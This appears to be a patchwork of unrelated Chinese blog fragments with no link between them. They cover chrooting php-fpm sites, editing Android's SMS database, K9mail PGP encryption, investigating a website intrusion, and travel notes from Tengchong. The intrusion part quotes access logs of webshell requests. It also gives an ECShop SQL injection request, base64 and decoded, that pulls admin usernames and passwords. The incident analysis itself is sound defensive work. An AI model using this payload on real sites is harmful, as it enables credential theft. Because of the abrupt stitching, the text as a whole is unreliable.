1、修改php-fpm配置文件，如A网站的配置文件为/etc/php-fpm.d/a.conf，在a.conf中增加
chroot = /var/www/a

2、修改nginx的虚拟主机配置
fastcgi_param SCRIPT_FILENAME /var/www/a/$fastcgi_script_name;
要改为
fastcgi_param SCRIPT_FILENAME $fastcgi_script_name;

3、建立必要的目录，复制文件。

mkdir tmp etc lib64 bin
cp /etc/hosts /etc/resolv.conf /etc/nsswitch.conf /etc/localtime etc
cp /lib64/libnss_dns.so.2 lib64  #域名解析需要，32位的系统就复制/lib/libnss_dns.so.2
chmod 1777 tmp
mkdir -p var/lib/php/session  #php.ini的session.save_path设置
chown root:apache var/lib/php/session
chmod 770 var/lib/php/session
mkdir -p usr/share/zoneinfo/Asia
cp /usr/share/zoneinfo/Asia/Shanghai usr/share/zoneinfo/Asia #跟php.ini配置的时区一致

4、修改php应用配置，使用TCP连接MySQL数据库

5、使php mail()函数可用
下载femail源代码，编译成静态链接的二进制文件，复制到usr/sbin/sendmail。
建立etc/femail.conf文件，内容如下：
smtphost = 127.0.0.1
myname = aa.me
找一个静态链接的ash.static文件，复制到bin/sh，测试发送邮件。

echo 'Subject: test'|chroot /var/www/a /usr/sbin/sendmail -v  xx@aa.me

在Google搜索之后，发现也有不少人遇到这个问题，机锋网的这个帖子介绍了解决的方法，但是帖子里面并没有提到mmssms.db文件的路径是什么。再次搜索后得知文件的路径是“/data/data/com.android.providers.telephony/databases/mmssms.db”。
拷贝mmssms.db文件到电脑上面处理麻烦了点，于是在手机上安装SQLite Editor来做这个事情。

用SQLite Editor打开“拨号器存储”，选择“mmssms.db”。

找到threads表，将date和snippet列数据为空的记录删除即可。

在还没有密钥的情况下，可以用口令进行加解密。但通常还是用APG提供的密钥管理工具导入GnuPG生成的密钥，或者是用APG生成密钥，然后再用公钥对文件/邮件进行加密。

新版本的K9mail在“账户设置”-“加密”-“OpenGPG提供者”设置为APG就可以用APG进行邮件加解密了。

在K9mail新建邮件，在界面上的“签名”、“加密”打勾，就能选择私钥给邮件做签名或者是选择公钥对邮件加密。

supervisorctl stop web
supervisorctl start web

60.182.70.x - - [22/May/2010:03:07:47 +0800] "POST /administrator/images/help.php HTTP/1.1" 200 233 "http://www.xx.net/administrator/images/help.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)" "-"

删除木马之后，发现入侵者还是尝试再次访问木马页面的，日志如下：

122.243.131.x - - [22/May/2010:17:57:35 +0800] "GET /administrator/images/help.php HT
TP/1.1" 404 56 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)" "
-"
122.243.131.x - - [22/May/2010:18:03:56 +0800] "GET /administrator/images/ HTTP/1.1"
404 522 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)" "-"
122.243.131.x - - [22/May/2010:18:04:02 +0800] "GET /administrator/images/help.php/x.
jpg HTTP/1.1" 404 522 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon
2.0)" "-"

进一步检查这个IP还做什么事情，发现攻击者是能够查看文件目录的，于是继续寻找其他后门。发现同一台服务器上的其他虚拟主机确实还有木马文件，初步认为入侵是源自那里。
//update:
后来发现入侵者还是写入了新的shell，只是没办法在那些目录下面执行，呵呵。通过日志检查发现他们是利用了ECShop的安全漏洞，利用这个漏洞产生的日志如下：

221.238.129.x - - [26/May/2010:18:28:40 +0800] "GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 HTTP/1.1" 200 560 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 638; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Media Center PC 5.0; SLCC1; Tablet PC 2.0)" "-"

攻击者提交的数据base64 decode的内容是：

a:1:{s:4:"attr";a:1:{s:125:"1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#";s:1:"1";}}

热海景区的主要景点是大滚锅，水温近100度，靠近就觉得热浪逼人，有一股很重的硫磺味。边上有人卖用大滚锅的热水蒸熟的鸡蛋，味道貌似也没什么特别的。

国殇墓园是滇西抗战期间腾冲收复战阵亡将士的纪念陵园，园内十分幽静，令人肃然起敬。

北海湿地属高原火山堰塞湖生态系统，乍一看感觉只是一片草地，细观才知道这一大片水草都是漂浮在湖面的，人踩在草上面也不会下沉，有点软软的感觉。